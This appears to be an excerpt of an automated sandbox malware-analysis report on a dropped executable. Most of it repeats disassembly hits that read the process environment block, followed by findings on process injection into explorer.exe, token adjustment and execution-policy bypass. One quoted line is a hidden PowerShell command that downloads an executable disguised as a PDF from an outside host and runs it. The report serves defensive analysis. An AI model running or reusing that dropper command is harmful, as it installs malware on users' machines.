          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]29_2_012EBA00
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]29_2_0139AA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]29_2_0139AA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h]29_2_012F3A1C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]29_2_012DAA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]29_2_012DAA16
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]29_2_012D5210
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131927A mov eax, dword ptr fs:[00000030h]29_2_0131927A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]29_2_0138B260
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]29_2_0138B260
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h]29_2_013A8A62
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]29_2_01315A69
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01364257 mov eax, dword ptr fs:[00000030h]29_2_01364257
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h]29_2_01391A5F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h]29_2_0139EA55
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]29_2_012D9240
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h]29_2_0130FAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]29_2_012D52A5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h]29_2_012D1AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov esi, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]29_2_013012BD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]29_2_012E62A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]29_2_01305AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]29_2_01305AA0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]29_2_012EAAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]29_2_012EAAB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139129A mov eax, dword ptr fs:[00000030h]29_2_0139129A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]29_2_0130D294
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]29_2_0130D294
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]29_2_0130DA88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]29_2_0130DA88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]29_2_0139B2E8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h]29_2_01302AE4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h]29_2_012D3ACA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h]29_2_013A8ADD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]29_2_012D5AC0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h]29_2_012D12D4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h]29_2_01302ACB
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h]29_2_0139E539
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h]29_2_0135A537
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]29_2_01304D3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]29_2_01304D3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]29_2_01304D3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8D34 mov eax, dword ptr fs:[00000030h]29_2_013A8D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]29_2_0130F527
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]29_2_0130F527
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]29_2_0130F527
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]29_2_012E3D34
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAD30 mov eax, dword ptr fs:[00000030h]29_2_012DAD30
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]29_2_01393518
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]29_2_01393518
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]29_2_01393518
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137CD04 mov eax, dword ptr fs:[00000030h]29_2_0137CD04
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]29_2_012D751A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]29_2_012D751A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]29_2_012D751A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]29_2_012D751A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]29_2_012FC577
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]29_2_012FC577
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]29_2_012F8D76
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]29_2_012F8D76
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]29_2_012F8D76
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]29_2_012F8D76
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]29_2_012F8D76
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]29_2_01314D51
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]29_2_01314D51
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]29_2_012D354C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]29_2_012D354C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FD52 mov eax, dword ptr fs:[00000030h]29_2_0138FD52
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01313D43 mov eax, dword ptr fs:[00000030h]29_2_01313D43
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353540 mov eax, dword ptr fs:[00000030h]29_2_01353540
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01383D40 mov eax, dword ptr fs:[00000030h]29_2_01383D40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F7D50 mov eax, dword ptr fs:[00000030h]29_2_012F7D50
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388D47 mov eax, dword ptr fs:[00000030h]29_2_01388D47
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]29_2_01301DB5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]29_2_01301DB5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]29_2_01301DB5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]29_2_013065A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]29_2_013065A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]29_2_013065A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013035A1 mov eax, dword ptr fs:[00000030h]29_2_013035A1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]29_2_013A05AC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]29_2_013A05AC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]29_2_012D2D8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]29_2_012D2D8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]29_2_012D2D8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]29_2_012D2D8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]29_2_012D2D8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]29_2_0130FD9B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]29_2_0130FD9B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]29_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]29_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]29_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]29_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]29_2_0139B581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]29_2_0139B581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]29_2_0139B581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]29_2_0139B581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]29_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3591 mov eax, dword ptr fs:[00000030h]29_2_012D3591
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388DF1 mov eax, dword ptr fs:[00000030h]29_2_01388DF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]29_2_012ED5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]29_2_012ED5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]29_2_0139FDE2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]29_2_0139FDE2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]29_2_0139FDE2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]29_2_0139FDE2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013095EC mov eax, dword ptr fs:[00000030h]29_2_013095EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov eax, dword ptr fs:[00000030h]29_2_012D95F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov ecx, dword ptr fs:[00000030h]29_2_012D95F0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FDD3 mov eax, dword ptr fs:[00000030h]29_2_0138FDD3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D15C1 mov eax, dword ptr fs:[00000030h]29_2_012D15C1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov ecx, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]29_2_01356DC9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]29_2_01303C3E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]29_2_01303C3E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]29_2_01303C3E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4439 mov eax, dword ptr fs:[00000030h]29_2_012D4439
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130BC2C mov eax, dword ptr fs:[00000030h]29_2_0130BC2C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]29_2_012EB433
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]29_2_012EB433
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]29_2_012EB433
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]29_2_012F2430
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]29_2_012F2430
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8C14 mov eax, dword ptr fs:[00000030h]29_2_013A8C14
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]29_2_013A740D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]29_2_013A740D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]29_2_013A740D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8410 mov eax, dword ptr fs:[00000030h]29_2_012D8410
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]29_2_01391C06
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]29_2_01356C0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]29_2_01356C0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]29_2_01356C0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]29_2_01356C0A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315C70 mov eax, dword ptr fs:[00000030h]29_2_01315C70
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F746D mov eax, dword ptr fs:[00000030h]29_2_012F746D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]29_2_0130AC7B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]29_2_0130AC7B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]29_2_0130AC7B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]29_2_0130AC7B
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Bypasses PowerShell execution policyShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\oftmhayq.exeMemory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\Public\oftmhayq.exeMemory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\oftmhayq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
